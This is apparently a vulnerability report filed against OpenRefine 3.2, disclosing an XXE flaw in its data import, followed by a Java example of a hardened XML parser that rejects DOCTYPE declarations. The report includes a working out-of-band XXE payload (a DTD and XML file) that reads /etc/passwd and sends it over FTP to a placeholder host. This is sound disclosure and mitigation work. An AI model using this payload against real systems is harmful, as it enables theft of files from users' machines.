**Describe the bug**
OpenRefine 3.2 (and below) has an XXE vulnerability that can be triggered through a data import. It is possible to steal data from an OpenRefine user.

Please consider disabling external DTDs.

**To Reproduce**
See the video (zipped because of GH file extension restrictions): xxe.zip

**Current Results**
File content is sent over FTP; no feedback is shown to the user.

**Desktop (please complete the following information):**
Tested on (desktop version is not important):

```
$ java -version
openjdk version "1.8.0_192"
OpenJDK Runtime Environment (build 1.8.0_192-b26)
OpenJDK 64-Bit Server VM (build 25.192-b26, mixed mode)
```

**OpenRefine (please complete the following information):**

**Datasets**
ext.dtd

```dtd
<!ENTITY % d SYSTEM "file:///etc/passwd">
<!ENTITY % c "<!ENTITY rrr SYSTEM 'ftp://x.x.x.x:5555/%d;'>">
```

payload.xml

```xml
<?xml version="1.0" ?>
<!DOCTYPE a [
  <!ENTITY % asd SYSTEM "http://x.x.x.x:4444/ext.dtd">
  %asd;
  %c;
]>
<a>&rrr;</a>
```

**Additional info**
Sorry that I was a bit inactive during the last issue :).
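The mitigation the report asks for (refusing external DTDs) is shown below as an added example; it is not code from the OpenRefine project, and it does not reflect how OpenRefine's importers are actually implemented. It builds a hardened JAXP `DocumentBuilderFactory` with the JDK's Xerces feature flags, then feeds it a copy of the reporter's `payload.xml` (the `x.x.x.x` host is the report's placeholder) and a harmless document, so a maintainer can see that the DOCTYPE-carrying payload is rejected before any entity is resolved while ordinary XML still parses. The class name `SafeXmlImport` and the helper names are assumptions for the example.

```java
import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import java.io.ByteArrayInputStream;
import java.nio.charset.StandardCharsets;
import org.w3c.dom.Document;

// Added example (not OpenRefine code): a DOM parser configured so that the
// OOB-XXE payload from this report cannot declare or resolve any entity.
public class SafeXmlImport {

    // Copy of the reporter's payload.xml; "x.x.x.x" is the placeholder used in the report.
    static final String PAYLOAD =
        "<?xml version=\"1.0\" ?>\n"
      + "<!DOCTYPE a [ <!ENTITY % asd SYSTEM \"http://x.x.x.x:4444/ext.dtd\"> %asd; %c; ]>\n"
      + "<a>&rrr;</a>";

    // Factory that refuses DTDs entirely and, as defence in depth, never fetches
    // external general/parameter entities or an external DTD even if one slips through.
    static DocumentBuilderFactory hardenedFactory() throws ParserConfigurationException {
        DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
        // Strongest control: any <!DOCTYPE ...> makes the parse fail.
        f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        // Belt and braces for parsers that tolerate a DOCTYPE but must not resolve anything.
        f.setFeature("http://xml.org/sax/features/external-general-entities", false);
        f.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        f.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        // Enables the JDK's built-in entity-expansion and access limits.
        f.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        // XInclude and entity expansion are further ways to pull in outside content.
        f.setXIncludeAware(false);
        f.setExpandEntityReferences(false);
        return f;
    }

    // Returns true when the document parsed, false when the hardened parser rejected it.
    // A rejection is the expected outcome for the report's payload.
    static boolean tryParse(DocumentBuilderFactory f, String xml) {
        try {
            DocumentBuilder b = f.newDocumentBuilder();
            Document d = b.parse(new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8)));
            return d != null;
        } catch (Exception e) {
            // Surface the reason to the importer's log so the user is told the file was refused,
            // instead of the silent behaviour the report describes.
            System.out.println("Rejected: " + e.getMessage());
            return false;
        }
    }

    public static void main(String[] args) throws Exception {
        DocumentBuilderFactory f = hardenedFactory();
        System.out.println("payload accepted:   " + tryParse(f, PAYLOAD));
        System.out.println("plain doc accepted: " + tryParse(f, "<a>hello</a>"));
    }
}
```

The feature URIs are the ones understood by the Xerces parser bundled with the JDK; a SAX or StAX based importer needs the equivalent settings on `SAXParserFactory` or `XMLInputFactory` (`XMLInputFactory.SUPPORT_DTD` set to `false`). Rejecting the DOCTYPE outright is preferable to only disabling external entities, because it also removes internal-entity expansion attacks and leaves nothing for a resolver to fetch.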
6a0d7d5
wetneb